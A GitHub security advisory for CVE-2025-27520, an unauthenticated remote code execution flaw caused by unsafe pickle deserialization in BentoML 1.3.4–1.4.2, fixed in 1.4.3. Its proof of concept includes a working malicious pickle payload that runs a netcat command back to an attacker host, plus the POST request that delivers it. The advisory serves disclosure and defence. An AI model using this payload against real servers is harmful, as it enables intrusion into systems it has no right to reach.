GHSA-33xw-247w-6hmc

Source

https://github.com/advisories/GHSA-33xw-247w-6hmc

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-33xw-247w-6hmc/GHSA-33xw-247w-6hmc.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-33xw-247w-6hmc

Aliases

CVE-2025-27520

Related

CVE-2025-27520

Published

2025-04-04T16:05:32Z

Modified

2025-04-04T16:42:23.179294Z

Severity

9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator

Summary

BentoML Allows Remote Code Execution (RCE) via Insecure Deserialization

Details

Summary

A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version(v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server.

Details

It exists an unsafe code segment in serde.py:

def deserialize_value(self, payload: Payload) -> t.Any:
    if "buffer-lengths" not in payload.metadata:
        return pickle.loads(b"".join(payload.data))

Through data flow analysis, it is confirmed that the payloadcontent is sourced from an HTTP request, which can be fully manipulated by the attack. Due to the lack of validation in the code, maliciously crafted serialized data can execute harmful actions during deserialization.

PoC

Environment:

Server host:
- IP: 10.98.36.123
- OS: Ubuntu
Attack host:
- IP: 10.98.36.121
- OS: Ubuntu

Follow the instructions on the BentoML official README(https://github.com/bentoml/BentoML) to set up the environment.

1.1 Install BentoML (Server host: 10.98.36.123) : pip install -U bentoml

1.2 Define APIs in a service.py file (Server host: 10.98.36.123) :

from __future__ import annotations

import bentoml

@bentoml.service(
    resources={"cpu": "4"}
)
class Summarization:
    def __init__(self) -> None:
        import torch
        from transformers import pipeline

        device = "cuda" if torch.cuda.is_available() else "cpu"
        self.pipeline = pipeline('summarization', device=device)

    @bentoml.api(batchable=True)
    def summarize(self, texts: list[str]) -> list[str]:
        results = self.pipeline(texts)
        return [item['summary_text'] for item in results]

1.3 Run the service code (Server host: 10.98.36.123) :

pip install torch transformers  # additional dependencies for local run

bentoml serve

Start nc listening on the attacking host (Attack host: 10.98.36.121) : nc -lvvp 1234

Send maliciously crafted request (Attack host: 10.98.36.121) :

import pickle
import os
import requests

headers = {'Content-Type': 'application/vnd.bentoml+pickle'}

class Evil:
    def __reduce__(self):
        return(os.system, ('nc 10.98.36.121 1234',))

payload = pickle.dumps(Evil())

requests.post("http://10.98.36.123:3000/summarize", data=payload, headers=headers)

Attack success (Attack host: 10.98.36.121) : The server host(10.98.36.123) has connected to the attacker's host(10.98.36.121) listening on port 1234.

Impact

Remote Code Execution (RCE).

Database specific

{
    "nvd_published_at": "2025-04-04T15:15:47Z",
    "cwe_ids": [
        "CWE-502"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-04T16:05:32Z"
}

References

Affected packages

PyPI / bentoml

Package

Name: bentoml; View open source insights on deps.dev
Purl: pkg:pypi/bentoml

Affected ranges

Type: ECOSYSTEM
Events: Introduced

1.3.4

Fixed

1.4.3

Affected versions

1.*

1.3.4.post1

1.3.5

1.3.6

1.3.7

1.3.8

1.3.9

1.3.10

1.3.11

1.3.12

1.3.13

1.3.14

1.3.15

1.3.16

1.3.17

1.3.18

1.3.19

1.3.20

1.3.21

1.3.22

1.4.0a1

1.4.0a2

1.4.0

1.4.1

1.4.2